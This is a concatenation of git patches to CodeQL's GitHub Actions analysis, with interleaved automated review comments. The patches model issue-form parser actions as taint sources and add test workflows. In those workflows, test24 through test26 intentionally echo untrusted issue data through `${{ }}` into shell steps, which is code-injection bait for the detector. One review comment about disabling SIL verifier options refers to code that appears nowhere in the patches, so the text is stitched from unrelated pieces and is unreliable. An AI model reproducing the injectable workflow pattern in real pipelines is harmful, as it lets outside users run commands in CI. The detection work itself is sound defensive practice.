ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml diff --git a/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml b/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml new file mode 100644 index 00000000000..14bd9a7875a --- /dev/null +++ b/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["peter-murray/issue-forms-body-parser", "*", "output.payload", "text", "manual"] 
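Review bot: `turnOffSilVerifications` switches off four SIL verifier options with no comment explaining why, and the call added to the `Observer` method in the following hunk is equally unexplained. A later reader cannot tell whether this works around a specific frontend failure or is a permanent design choice, nor when it would be safe to remove. Add a rationale above the function, for example `// SIL verification is disabled during extraction because <reason / issue reference placeholder>`. The `Observer` method that makes the call begins outside its hunk.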
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml new file mode 100644 index 00000000000..a90c55df937 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml @@ -0,0 +1,19 @@ +on: + issues: + +jobs: + test: + runs-on: ubuntu-22.04 + steps: + - name: Run Issue form parser + id: parse + uses: peter-murray/issue-forms-body-parser@v4.0.0 + with: + issue_id: ${{ github.event.issue.number }} + separator: '###' + label_marker_start: '>>' + label_marker_end: '<<' + + - name: Show parsed data JSON + run: | + echo ${{ steps.parse.outputs.payload }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index a862c0901ca..a3119c0fd75 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -198,6 +198,7 @@ edges | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -583,6 +584,8 @@ nodes | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -760,6 +763,7 @@ subpaths | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index be14d58737e..0af7aeb0958 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -198,6 +198,7 @@ edges | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -583,6 +584,8 @@ nodes | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From d85ca107725fd6f277c614ee7c22d3ebc5ad5ba3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 13:36:59 +0100 Subject: [PATCH 0667/1267] fix: account for tojson(expr) expressions --- ql/lib/codeql/actions/ast/internal/Ast.qll | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 1589b18efb0..e5ad86a226c 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1636,7 +1636,7 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) 
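Review bot: The new pattern `(?i)(from|to)json\\((.*)\\).*` in StepsExpressionImpl makes the alternation a capturing group, which is the only reason the group index moves from 1 to 2; a non-capturing group, `regexpCapture("(?i)(?:from|to)json\\((.*)\\).*", 1)`, keeps the index stable. The same line is repeated in the NeedsExpressionImpl, JobsExpressionImpl, EnvExpressionImpl and MatrixExpressionImpl hunks, so a shared helper predicate would stop the five copies drifting apart. Resolving `toJSON(x)` to `x` matters for the injection queries, because JSON-encoding a value does not make it safe to interpolate into a script. The greedy `(.*)` presumably over-captures when one expression contains several calls, which predates this change; the enclosing predicates start and end outside the hunks.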
@@ -1677,7 +1677,7 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) @@ -1721,7 +1721,7 @@ class JobsExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) @@ -1780,7 +1780,7 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) @@ -1815,7 +1815,7 @@ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) From 0211902116d2216877ce7126434cd7475d43f218 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 13:38:17 +0100 Subject: [PATCH 0668/1267] models: add models for zentered/issue-forms-parser --- .../codeql/actions/dataflow/FlowSources.qll | 14 +++++++++ ql/lib/codeql/actions/dataflow/TaintSteps.qll | 21 ++++++++++++++ ...zentered_issue-forms-body-parser.model.yml | 6 ++++ .../CWE-094/.github/workflows/test25.yml | 13 +++++++++ .../CWE-094/.github/workflows/test26.yml | 29 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 20 +++++++++++++ .../CWE-094/CodeInjectionMedium.expected | 16 ++++++++++ 7 files changed, 119 insertions(+) create mode 100644 ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index fa964f475cf..2fca425642e 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -361,6 +361,20 @@ class Xt0rtedSlashCommandSource extends RemoteFlowSource { override Event getEvent() { result = this.asExpr().getATriggerEvent() } } +class ZenteredIssueFormBodyParserSource extends RemoteFlowSource { + ZenteredIssueFormBodyParserSource() { + exists(UsesStep u | + u.getCallee() = "zentered/issue-forms-body-parser" and + not exists(u.getArgument("body")) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "text" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } +} + class OctokitRequestActionSource extends RemoteFlowSource { OctokitRequestActionSource() { exists(UsesStep u, string route | diff --git a/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/ql/lib/codeql/actions/dataflow/TaintSteps.qll index 80858df909b..56e2c75123c 100644 --- a/ql/lib/codeql/actions/dataflow/TaintSteps.qll 
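Review bot: ZenteredIssueFormBodyParserSource has no QLDoc, and the reason for `not exists(u.getArgument("body"))` cannot be read from the code. A comment such as `/** A zentered/issue-forms-body-parser step without a body input; its outputs are presumably derived from the triggering issue. */` would record it, and the `with: body` case appears to be left to the summary model added in the same commit. The callee check is an exact string comparison, so it is worth confirming that `getCallee()` normalizes case; otherwise a differently-cased `uses:` reference would not be reported as a source.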
+++ b/ql/lib/codeql/actions/dataflow/TaintSteps.qll @@ -91,6 +91,25 @@ predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node ) } +/** + * A read of user-controlled field of the zentered/issue-forms-body-parser action. + */ +predicate zenteredIssueFormBodyParserSource(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof ZenteredIssueFormBodyParserSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + ( + not o instanceof JsonReferenceExpression and + o.getFieldName() = "data" + or + o instanceof JsonReferenceExpression and + o.(JsonReferenceExpression).getInnerExpression().matches("%.data") + ) and + succ.asExpr() = o + ) +} + /** * A read of user-controlled field of the octokit/request-action action. */ @@ -130,6 +149,8 @@ class TaintSteps extends AdditionalTaintStep { tjActionsChangedFilesTaintStep(node1, node2) or tjActionsVerifyChangedFilesTaintStep(node1, node2) or xt0rtedSlashCommandActionTaintStep(node1, node2) or + xt0rtedSlashCommandActionTaintStep(node1, node2) or + zenteredIssueFormBodyParserSource(node1, node2) or octokitRequestActionTaintStep(node1, node2) } } diff --git a/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml b/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml new file mode 100644 index 00000000000..1a40a634118 --- /dev/null +++ b/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["zentered/issue-forms-body-parser", "*", "input.body", "output.data", "taint", "manual"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml new file mode 100644 index 00000000000..0bd666dc948 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml 
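Review bot: The predicate added in the first TaintSteps.qll hunk is a taint step but is named `zenteredIssueFormBodyParserSource`, which reads like the `ZenteredIssueFormBodyParserSource` class it tests against and breaks the `...TaintStep` naming of its siblings; `zenteredIssueFormBodyParserTaintStep` would be consistent. In the JSON branch, `matches("%.data")` accepts any inner expression that ends in `.data`. The step still appears to be tied to the parser step through `getTarget()` and `getStepId()`, so a one-line comment stating that would help the next reader.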
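Review bot: The second TaintSteps.qll hunk adds `xt0rtedSlashCommandActionTaintStep(node1, node2) or` directly below the identical context line, so that disjunct now appears twice in the TaintSteps class. It does not change the result but looks like a copy-paste slip; only `zenteredIssueFormBodyParserSource(node1, node2) or` needs to be added. The enclosing class starts outside the hunk.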
@@ -0,0 +1,13 @@ +name: Issue Forms Body Parser + +on: issues + +jobs: + process: + runs-on: ubuntu-latest + steps: + - name: Issue Forms Body Parser + id: parse + uses: zentered/issue-forms-body-parser@v2.0.0 + - run: echo ${{ steps.parse.outputs.data }} + - run: echo ${{ toJSON(steps.parse.outputs.data) }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml new file mode 100644 index 00000000000..8648d86983e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml @@ -0,0 +1,29 @@ +name: Issue Forms Body Parser + +on: + workflow_dispatch: + inputs: + issue_number: + type: string + description: issue number + required: true +env: + GH_TOKEN: ${{ github.token }} + +jobs: + process: + runs-on: ubuntu-latest + steps: + - name: Fetch the issue + id: read_issue_body + run: + echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT + + - name: Issue Forms Body Parser + id: parse + uses: zentered/issue-forms-body-parser@v2.0.0 + with: + body: ${{ steps.read_issue_body.outputs.body }} + + - run: echo ${{ steps.parse.outputs.data }} + - run: echo ${{ toJSON(steps.parse.outputs.data) }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index a3119c0fd75..7722e6a2140 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -199,6 +199,13 @@ edges | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | provenance | | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | 
provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -586,6 +593,15 @@ nodes | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | semmle.label | Run Step: read_issue_body [body] | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | semmle.label | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | semmle.label | Uses Step: parse [data] | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | semmle.label | steps.read_issue_body.outputs.body | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 
[value] | 
@@ -764,6 +780,10 @@ subpaths | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | 
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 0af7aeb0958..e6066479576 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
